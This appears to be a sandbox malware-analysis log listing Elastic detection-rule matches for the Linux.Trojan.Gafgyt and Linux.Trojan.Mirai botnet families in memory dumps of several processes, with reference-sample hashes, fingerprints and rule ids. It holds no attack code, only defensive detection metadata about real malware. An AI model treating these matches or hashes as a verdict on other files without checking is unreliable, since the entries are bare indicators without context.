Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_862c4e0e reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2a6b4f8d8fb4703ed26bdcfbbb5c539dc451c8b90649bee80015c164eae4c281, id = 862c4e0e-83a4-458b-8c00-f2f3cf0bf9db, last_modified = 2021-09-16
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_32eb0c81 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 7c50ed29e2dd75a6a85afc43f8452794cb787ecd2061f4bf415d7038c14c523f, id = 32eb0c81-25af-4670-ab77-07ea7ce1874a, last_modified = 2021-09-16
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_3fe3c668 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 2a79caea707eb0ecd740106ea4bed2918e7592c1e5ad6050f6f0992cf31ba5ec, id = 3fe3c668-89f4-4601-a167-f41bbd984ae5, last_modified = 2021-09-16
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_637f2c04 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 7af3d573af8b7f8252590a53adda52ecf53bdaf9a86b52ef50702f048e08ba8c, id = 637f2c04-98e4-45aa-b60a-14a96c6cebb7, last_modified = 2021-09-16
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a6a2adb9 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = cdd0bb9ce40a000bb86b0c76616fe71fb7dbb87a044ddd778b7a07fdf804b877, id = a6a2adb9-9d54-42d4-abed-5b30d8062e97, last_modified = 2021-09-16
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_f3d83a74 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 1c5df68501b688905484ed47dc588306828aa7c114644428e22e5021bb39bd4a, id = f3d83a74-2888-435a-9a3c-b7de25084e9a, last_modified = 2021-09-16
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_e0673a90 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 6834f65d54bbfb926f986fe2dd72cd30bf9804ed65fcc71c2c848e72350f386a, id = e0673a90-165e-4347-a965-e8d14fdf684b, last_modified = 2021-09-16
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_31796a40 reference_sample = 227c7f13f7bdadf6a14cc85e8d2106b9d69ab80abe6fc0056af5edef3621d4fb, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 0a6c56eeed58a1a100c9b981157bb864904ffddb3a0c4cb61ec4cc0d770d68ae, id = 31796a40-1cbe-4d0c-a785-d16f40765f4a, last_modified = 2021-09-16
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a0a4de11 reference_sample = cf1ca1d824c8687e87a5b0275a0e39fa101442b4bbf470859ddda9982f9b3417, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 891cfc6a4c38fb257ada29050e0047bd1301e8f0a6a1a919685b1fcc2960b047, id = a0a4de11-fe65-449f-a990-ad5f18ac66f0, last_modified = 2021-09-16
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_09c3070e reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 84fad96b60b297736c149e14de12671ff778bff427ab7684df2c541a6f6d7e7d, id = 09c3070e-4b71-45a0-aa62-0cc6e496644a, last_modified = 2021-09-16
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_46eec778 reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2602371a40171870b1cf024f262e95a2853de53de39c3a6cd3de811e81dd3518, id = 46eec778-7342-4ef7-adac-35bc0cdb9867, last_modified = 2021-09-16
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_3fe3c668 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 2a79caea707eb0ecd740106ea4bed2918e7592c1e5ad6050f6f0992cf31ba5ec, id = 3fe3c668-89f4-4601-a167-f41bbd984ae5, last_modified = 2021-09-16
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_637f2c04 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 7af3d573af8b7f8252590a53adda52ecf53bdaf9a86b52ef50702f048e08ba8c, id = 637f2c04-98e4-45aa-b60a-14a96c6cebb7, last_modified = 2021-09-16
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a6a2adb9 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = cdd0bb9ce40a000bb86b0c76616fe71fb7dbb87a044ddd778b7a07fdf804b877, id = a6a2adb9-9d54-42d4-abed-5b30d8062e97, last_modified = 2021-09-16
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_f3d83a74 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 1c5df68501b688905484ed47dc588306828aa7c114644428e22e5021bb39bd4a, id = f3d83a74-2888-435a-9a3c-b7de25084e9a, last_modified = 2021-09-16
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_e0673a90 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 6834f65d54bbfb926f986fe2dd72cd30bf9804ed65fcc71c2c848e72350f386a, id = e0673a90-165e-4347-a965-e8d14fdf684b, last_modified = 2021-09-16
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_31796a40 reference_sample = 227c7f13f7bdadf6a14cc85e8d2106b9d69ab80abe6fc0056af5edef3621d4fb, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 0a6c56eeed58a1a100c9b981157bb864904ffddb3a0c4cb61ec4cc0d770d68ae, id = 31796a40-1cbe-4d0c-a785-d16f40765f4a, last_modified = 2021-09-16
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a0a4de11 reference_sample = cf1ca1d824c8687e87a5b0275a0e39fa101442b4bbf470859ddda9982f9b3417, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 891cfc6a4c38fb257ada29050e0047bd1301e8f0a6a1a919685b1fcc2960b047, id = a0a4de11-fe65-449f-a990-ad5f18ac66f0, last_modified = 2021-09-16
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_09c3070e reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 84fad96b60b297736c149e14de12671ff778bff427ab7684df2c541a6f6d7e7d, id = 09c3070e-4b71-45a0-aa62-0cc6e496644a, last_modified = 2021-09-16
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_46eec778 reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2602371a40171870b1cf024f262e95a2853de53de39c3a6cd3de811e81dd3518, id = 46eec778-7342-4ef7-adac-35bc0cdb9867, last_modified = 2021-09-16
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_656bf077 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ea8ed60190198d5887bb7093975d648a9fd78234827d648a8258008c965b1c1, id = 656bf077-ca0c-4d28-9daa-eb6baafaf467, last_modified = 2021-09-16
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_dd0d6173 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 5e2cb111c2b712951b71166111d339724b4f52b93f90cb474f1e67598212605f, id = dd0d6173-b863-45cf-9348-3375a4e624cf, last_modified = 2021-09-16
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_779e142f reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 83377b6fa77fda4544c409487d2d2c1ddcef8f7d4120f49a18888c7536f3969f, id = 779e142f-b867-46e6-b1fb-9105976f42fd, last_modified = 2021-09-16
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_cf84c9f2 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = bb766b356c3e8706740e3bb9b4a7171d8eb5137e09fc7ab6952412fa55e2dcfc, id = cf84c9f2-7435-4faf-8c5f-d14945ffad7a, last_modified = 2021-09-16
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_862c4e0e reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2a6b4f8d8fb4703ed26bdcfbbb5c539dc451c8b90649bee80015c164eae4c281, id = 862c4e0e-83a4-458b-8c00-f2f3cf0bf9db, last_modified = 2021-09-16
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_32eb0c81 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 7c50ed29e2dd75a6a85afc43f8452794cb787ecd2061f4bf415d7038c14c523f, id = 32eb0c81-25af-4670-ab77-07ea7ce1874a, last_modified = 2021-09-16
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_3fe3c668 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 2a79caea707eb0ecd740106ea4bed2918e7592c1e5ad6050f6f0992cf31ba5ec, id = 3fe3c668-89f4-4601-a167-f41bbd984ae5, last_modified = 2021-09-16
Source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_637f2c04 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 7af3d573af8b7f8252590a53adda52ecf53bdaf9a86b52ef50702f048e08ba8c, id = 637f2c04-98e4-45aa-b60a-14a96c6cebb7, last_modified = 2021-09-16
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a6a2adb9 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = cdd0bb9ce40a000bb86b0c76616fe71fb7dbb87a044ddd778b7a07fdf804b877, id = a6a2adb9-9d54-42d4-abed-5b30d8062e97, last_modified = 2021-09-16
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_f3d83a74 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 1c5df68501b688905484ed47dc588306828aa7c114644428e22e5021bb39bd4a, id = f3d83a74-2888-435a-9a3c-b7de25084e9a, last_modified = 2021-09-16
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_e0673a90 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 6834f65d54bbfb926f986fe2dd72cd30bf9804ed65fcc71c2c848e72350f386a, id = e0673a90-165e-4347-a965-e8d14fdf684b, last_modified = 2021-09-16
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_31796a40 reference_sample = 227c7f13f7bdadf6a14cc85e8d2106b9d69ab80abe6fc0056af5edef3621d4fb, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 0a6c56eeed58a1a100c9b981157bb864904ffddb3a0c4cb61ec4cc0d770d68ae, id = 31796a40-1cbe-4d0c-a785-d16f40765f4a, last_modified = 2021-09-16
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a0a4de11 reference_sample = cf1ca1d824c8687e87a5b0275a0e39fa101442b4bbf470859ddda9982f9b3417, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 891cfc6a4c38fb257ada29050e0047bd1301e8f0a6a1a919685b1fcc2960b047, id = a0a4de11-fe65-449f-a990-ad5f18ac66f0, last_modified = 2021-09-16
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
